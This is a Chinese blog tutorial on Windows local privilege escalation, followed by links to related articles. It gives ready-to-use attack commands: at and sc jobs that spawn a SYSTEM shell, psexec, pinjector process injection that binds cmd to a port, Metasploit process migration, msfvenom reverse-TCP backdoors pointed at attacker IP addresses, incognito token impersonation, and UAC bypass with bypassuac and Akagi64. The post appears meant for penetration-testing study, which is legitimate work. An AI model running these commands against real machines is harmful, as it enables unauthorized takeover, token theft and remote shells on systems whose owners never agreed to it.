权限提升--Windows本地用户

已于 2022-12-07 13:11:35 修改
阅读量1.2k 收藏 4
点赞数 1
文章标签: 数据库 服务器 运维
于 2022-12-07 11:57:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65336233/article/details/128216785
版权

目录

知识点

1、需要了解掌握的权限

2、常见权限获取方法简要归类说明

3、常见权限获取后的影响

案例演示

Windows权限提升-AT

Windows权限提升-SC

Windows权限提升-PS

Windows权限提升-迁移注入

Windows权限提升-MSF迁移注入

Windows权限提升-令牌窃取

Windows权限提权-Bypass

Windows权限提权-UACME

知识点

1、需要了解掌握的权限

后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等

2、常见权限获取方法简要归类说明

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入

网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell

数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入

接口权限:SQL注入,数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入

系统权限:高危系统漏洞直达或网站权限提升转入、数据库权限提升转入,第三方转入等

域控权限:高危系统漏洞直达或内网横向渗透转入,域控其他服务安全转入等

3、常见权限获取后的影响

后台权限:

常规WEB界面文章分类等操作,后台功能可操作类

网站权限:

查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。

数据库权限:

操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。

接口权限:

后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。

系统权限:如同在你自己操作自己的电脑一样

域控权限:如同在你自己操作自己的虚拟机一样

案例演示

Windows权限提升-AT

at命令提权的原理--需要admin用户。

at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。

适用版本:Win2000 & Win2003 & XP & win7之前的版本中还是存在的,在Win7以后被剔除.

当我们拿到低权限的用户,通过连接上服务器后,可以通过at命令来进行本地提权。

命令:at 21:00 /interactive cmd (在21::00分生成一个交互式的System权限的cmd)

Windows权限提升-SC

sc是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于控制面板中管理工具项中的服务。适用版本:windows 7、8、03、08、12、16

#创建一个名叫syscmd的新的交互式的cmd服务

命令:sc Create syscmd binPath= "cmd /K start" type= own type= interact

#运行服务

命令:sc start syscmd   

Windows权限提升-PS

PsTools下载

命令:psexec.exe -accepteula -s -i -d cmd  #调用运行cmd 

直接下载工具,利用命令执行cmd即可

Windows权限提升-迁移注入

该方法可以简单的理解为在一个system权限执行的进程中,打开一个后门,将cmd的线程注入进行。

获取进程信息,找到为system的信息 

pinjector -l

在system的进程下弄个cmd线程,并开启一个3333端口  

pinjector -p 356 cmd 3333  

 攻击机上进行监听即可 

nc 127.0.0.1 3333

Windows权限提升-MSF迁移注入

利用kali的msf获取webshell后,利用ps命令查看进程

命令:ps

迁移对应PID,会尝试将本地的端口前移到目标的288端口,从而获取权限 

命令:migrate PID

Windows权限提升-令牌窃取

 

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。

命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe

生成后门,并进行监听获取webshell。

利用msf的incognito模块并利用命令获取令牌

命令:        

        use incognito        使用incognito模块

        list_tokens -u        获取令牌

切换令牌从而获取权限

命令:impersonate_token "NT AUTHORITY\SYSTEM"        切换令牌 

Windows权限提权-Bypass

利用msf后门获取webshell权限,此处常规操作,可以略过。

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.46.158 lport=3333 -f exe -o msf.exe         后门生成

利用msf中的bypassua目录进行提权。因为小编的获取webshell权限的会话是session 2,所以直接绑定session 2,通常情况下也可以绑定ip或端口。

getsystem提权即可。

命令:use exploit/windows/local/bypassua

Windows权限提权-UACME

UAC工具 

UAC介绍:UAC即User Account Control,一般指用户帐户控制,是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。

通俗理解UAC:UAC简单既又通俗的理解就是在执行脚本或命令时会弹出窗口,确认知否执行。

利用Akagi64.exe 41或61去执行msf生成的后门脚本msf1.exe   利用Akagi64的41模式绕过uac执行exe文件。

Akagi64.exe 编号 调用执行

getsystem获取权限即可 

@墨竹
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Syscmd系统命令工具
08-16
双击开发安装,选择一个存储快捷命令的目录即可。 该工具主要功能: 1. 提供如图所示的文件和文件夹快捷菜单 2. 在文件或文件夹上点右键选择"G创建系统命令",可以创建一个系统快捷命令,无论什么时候只要WIN+R,输入命令如“ps"即可运行photoshop等软件 3. 右键菜单中还提供直接复制路径,直接定位快捷方式对应的文件位置,直接在当前位置运行CMD命令行,直接编辑当前文件等等 4. WIN+R打开运行,输入qc list可以列出当前有哪些可用的命令,并能看到所有命令对应的程序或者文档路径 5. WIN+R打开运行,输入w加上快捷命令的名字可以直接定位该命令对应的程序或文档的位置 都是我比较喜欢的快捷方法,如果你也喜欢可以下载试试。
windows权限提升-WIN提权
最新发布
2401_84466224的博客
06-16 1268
Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。只要用户账户加入到这些本地组内,这回用户账户也将具备该组所拥有的权限
windows系统权限提升
weixin_53639243的博客
04-23 1649
提权方法。
Windows权限提升
Williamanddog的博客
02-07 2376
kiwi_cmd可以使用mimikatz的全部功能,比如kiwi_cmd sekurlsa::logonpasswords获取明文密码。run post/multi/recon/local_exploit_suggester查询哪些提权exp可以用。systeminfo查看系统补丁:一般的,如果网站安全做好的的情况下,会有几百个补丁。tasklist 查看当前运行的进程,是否有av,可利用的第三方的服务提权等。systeminfo 查看服务器信息及相应的补丁,可找相应的补丁提权。
Windows本地提权 · 上篇
qq_61553520的博客
05-31 1676
Windows本地提权,这种提权适用于有一本地个用户的基础上,有一定的权限,无法从webshell上进行提权。
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1364
进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库权限数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
Windows提升权限思路
赵继源的博客
07-27 2218
选中要修改权限的文件或文件夹,按住Alt+Enter键打开属性页面,点击高级。
CVE-2022-37969 Windows 本地权限提升 PoC
08-23
// Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation.  // Authors: www.chwm.vip // #pragma warning (disable : 4005) #include #include #include ...
redis-client-windows
01-11
6. **安全与性能**:在Windows环境中使用Redis,需要注意安全问题,如设置合适的访问权限,避免不必要的网络暴露。此外,了解如何优化Redis的配置,比如调整内存策略、限制最大连接数等,对于提升系统性能至关重要。...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
具体来说,该漏洞允许攻击者向AFD驱动程序发送恶意输入/输出控制(IOCTL)请求,这可能导致以提升权限执行任意代码。  受影响系统 : Windows 11 Version 22H2 for x64-based Systems Windows 11 Version 22H2 ...
redis-x64-7.0.4 for windows
09-01
总的来说,"redis-x64-7.0.4 for windows"为Windows开发者提供了一个便捷的本地Redis环境,便于开发和测试。通过理解Redis的基本操作和配置,你可以充分利用它的强大功能,为你的应用程序带来高效的缓存和数据存储...
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取和进程注入...
windows权限提升——AT、SC、PS命令提权
W小哥
11-25 5705
一、AT命令 适用范围: Windows2000、Windows 2003、Windows XP 1.1 AT命令简介 AT命令Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。 因为AT命令默认是以system权限下运行的所以我们可以利用以下命令,进行提权。 1.2 AT命令提权实验 系统:windows2003 命令: at 13:38
Windows提权常用命令
weixin_39216626的博客
01-07 2358
Windows提权 1、whoami查看当前权限,当不是administrator或者system时需要提权 2、ipconfig,查看服务器为内网还是外网,内网进服务器则需要转发端口 3、quser查看管理是否在线 4、systeminfo查看服务器信息及相应的补丁,可找相应的补丁提权 5、tasklist查看当前运行的进程,是否有av,可利用的第三方的服务提权等 6、net user查看用户,...
windows系统,计算机cmd管理员,命令行中普通用户获取管理员权限命令
热门推荐
质量不太好的博客
01-09 1万+
windows系统,计算机cmd管理员,命令行中普通用户获取管理员权限命令
权限提升-Win溢出漏洞及AT&SC&PS提权
xhscxj的博客
02-28 470
明确权限提升基础知识:权限划分 明确权限提升环境问题:web及本地 明确权限提升方法针对:针对方法适应问题 明确权限提升针对版本:个人及服务器版本,针对方法 知识点必备: 用户及用户组权限划分;Windows 提权命令 系统命令 命令 描述 systeminfo 打印系统信息 whoami 获得当前用户名 whoami /priv 当前账户权限 ipconfig 网络配置信息 ipconfig /displaydns 显示DNS缓存 route print 打印出路.
system.exe病毒探秘
twosecond
03-08 3045
上周五遇到system.exe病毒,初次交锋,没有找到对付它的有效招式,就连组策略里面威力强大的软件散列规则也拿他没辙!最后只好重装系统了事,而且格式化系统盘重装系统后还有一点问题!让我着实郁闷了两天之久!       这两天是休息天,我把拷贝回来的system.exe病毒在自家电脑上做试验,终于发现了它的奥秘!       system.exe病毒文件仅仅5.5Kb大小,然而个头虽小能耐
权限提升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
今天是几号的博客
02-20 845
适用版本:windows 7、8、03、08、12、16。当我们拿到低权限的用户(webshell用户不能创建计划命令),通过连接上服务器后,可以通过at命令来进行本地提权。适用版本:Test in Win2012 and Win2008 & Win2016 其他未测 基本可以。适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除.at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。#创建一个名叫syscmd的新的交互式的cmd执行服务。
第101天:权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
09-15
权限提升是一种操作系统安全漏洞利用技术,通过提升用户或进程的权限来获取更高的操作权限。针对Windows本地用户权限提升,可以使用进程注入、令牌窃取以及AT、SC和PS服务命令等方法。进程注入是指将恶意代码注入到系统进程中,从而获取系统权限。令牌窃取指利用某些漏洞获取管理员权限令牌,然后使用这些令牌执行操作。AT、SC和PS服务命令Windows系统中的命令行工具,可以用于创建和管理计划任务、服务和进程。 在Windows本地环境下,可以使用这些方法进行权限提升。具体而言,可以通过系统溢出漏洞、AT命令、SC命令和PS命令等来实现。其中,系统溢出漏洞是指利用程序或操作系统中的漏洞,使程序或操作系统的行为超出设计时的预期,从而实现对系统的控制。AT命令是用于创建和管理计划任务的命令,SC命令是用于创建和管理服务的命令,PS命令是用于管理进程的命令。 对于具体的案例,我们可以通过判断使用哪种溢出漏洞以及在哪里找到漏洞,来选择合适的方法进行权限提升
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值